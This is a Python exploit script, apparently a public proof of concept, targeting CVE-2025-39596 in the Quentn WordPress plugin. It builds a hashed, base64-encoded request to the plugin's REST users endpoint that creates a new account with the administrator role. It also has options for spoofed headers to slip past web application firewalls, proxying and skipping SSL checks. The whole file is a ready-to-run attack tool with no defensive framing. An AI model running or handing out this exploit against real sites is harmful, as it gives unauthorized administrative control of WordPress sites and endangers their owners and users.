#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import argparse
import base64
import hashlib
import json
import random
import requests
import time
import urllib3
from urllib.parse import urlparse
def print_banner():
banner = r"""
@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@ @@@@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@ @@@@@@@ @@@@@@ @@@@@@
@@@@@@@@ @@@ @@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@ @@@@@@@@ @@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@@@ @@@ !@@ @@@ @@! @@@ !@@ @@! @@@ !@@
!@! !@! @!@ !@! @!@ !@! @!@!@ @!@ !@! @!@ !@! @!@ !@! !@! @!@ !@!
!@! @!@ !@! @!!!:! @!@!@!@!@ !!@ @!@ @! !@! !!@ !!@@!! @!@!@!@!@ @!@!!@ !!@!!@!! !!@@!! !!@!!@!! !!@@!@!
!!! !@! !!! !!!!!: !!!@!@!!! !!: !@!!! !!! !!: @!!@!!! !!!@!@!!! !!@!@! !!@!!! @!!@!!! !!@!!! @!!@!!!!
:!! :!: !!: !!: !:! !!:! !!! !:! !:! !!: !!! !:! !!! !:! !:!
:!: ::!!:! :!: :!: :!: !:! :!: !:! :!: !:! !:! !:! :!: !:!
::: ::: :::: :: :::: :: ::::: ::::::: :: :: ::::: :::: :: :: :::: ::::: :: :::: :: ::::: :: :::: :::
:: :: : : : :: :: :: : ::: : : : : :: : ::: :: : : : : : : : : :: : : : : : :: : :
"""
print(banner)
print("Nxploited | Khaled Alenazi\n")
def gen_headers(cookie=None, add_extra=False):
agents = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Nxploited",
"Mozilla/5.0 (X11; Linux x86_64) Nxploited",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Nxploited",
"Nxploited/1.0 (compatible;)",
"Nxploited/2.0 (Special Edition)",
"Mozilla/5.0 Nxploited",
"Nxploited-Bypass/7.0",
"Nxploited-Advanced/1337"
]
h = {
"User-Agent": random.choice(agents) + " | Nxploited",
"X-Nxploited": "Nxploited",
"Content-Type": "application/json",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "close"
}
if add_extra:
h["Referer"] = "https://google.com/Nxploited"
h["X-Forwarded-For"] = "127.0.0.1"
h["Forwarded"] = "for=127.0.0.1"
h["Nxploited-Skip"] = "true"
h["Accept"] = "*/*"
if cookie:
h["Cookie"] = cookie
return h
def build_inner_json(email, fname, lname, role):
return {
"data": {
"users": [
{
"email": email,
"first_name": fname,
"last_name": lname
}
],
"roles": {
"add_roles": [role]
},
"notify": False
}
}
def encode_payload(inner_json):
return base64.b64encode(json.dumps(inner_json).encode()).decode()
def gen_vu():
return int(time.time()) + random.randint(1800, 3700)
def build_hash(b64_data, vu, key):
raw = f"{b64_data}{vu}{key}" if key else f"{b64_data}{vu}"
return hashlib.sha256(raw.encode()).hexdigest()
def build_payload(email, fname, lname, role, key):
inner_json = build_inner_json(email, fname, lname, role)
b64_data = encode_payload(inner_json)
vu = gen_vu()
hash_val = build_hash(b64_data, vu, key)
return {
"data": b64_data,
"vu": vu,
"hash": hash_val
}
def normalize_url(url):
parsed = urlparse(url, "http")
scheme = parsed.scheme if parsed.scheme in ["http", "https"] else "http"
netloc = parsed.netloc if parsed.netloc else parsed.path
return f"{scheme}://{netloc.rstrip('/')}/wp-json/quentn/api/v1/users"
def send_exploit(url, payload, headers, proxies=None, verify_ssl=False):
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
try:
r = requests.post(url, headers=headers, data=json.dumps(payload), timeout=20, proxies=proxies or {}, verify=verify_ssl)
return r
except Exception as e:
return e
def is_success(response):
if isinstance(response, Exception):
return False, f"Request Error: {response}"
if "Data Successfully Updated" in response.text:
return True, "Exploit Success By | Nxploited"
return False, f"{response.status_code} | {response.text[:256]}"
def main():
print_banner()
parser = argparse.ArgumentParser(description="CVE-2025-39596 | Nxploited")
parser.add_argument("-u", "--url", required=True, help="Target WordPress site URL")
parser.add_argument("-e", "--email", required=True, help="Email for new admin account")
parser.add_argument("-f", "--fname", default="Pwn", help="First name")
parser.add_argument("-l", "--lname", default="Admin", help="Last name")
parser.add_argument("-r", "--role", default="administrator", help="Role to assign")
parser.add_argument("-k", "--key", default="", help="Quentn API key if known")
parser.add_argument("--cookie", default=None, help="Add cookie for authenticated bypass if needed")
parser.add_argument("--proxy", default=None, help="Proxy (ex: http://127.0.0.1:8080)")
parser.add_argument("--skip-ssl", action="store_true", help="Skip SSL verification")
parser.add_argument("--extra", action="store_true", help="Add extra headers (bypass/WAF/etc)")
args = parser.parse_args()
endpoint = normalize_url(args.url)
payload = build_payload(args.email, args.fname, args.lname, args.role, args.key)
proxies = {"http": args.proxy, "https": args.proxy} if args.proxy else None
headers = gen_headers(args.cookie, args.extra)
response = send_exploit(endpoint, payload, headers, proxies, not args.skip_ssl)
ok, msg = is_success(response)
print(msg)
if __name__ == "__main__":
main()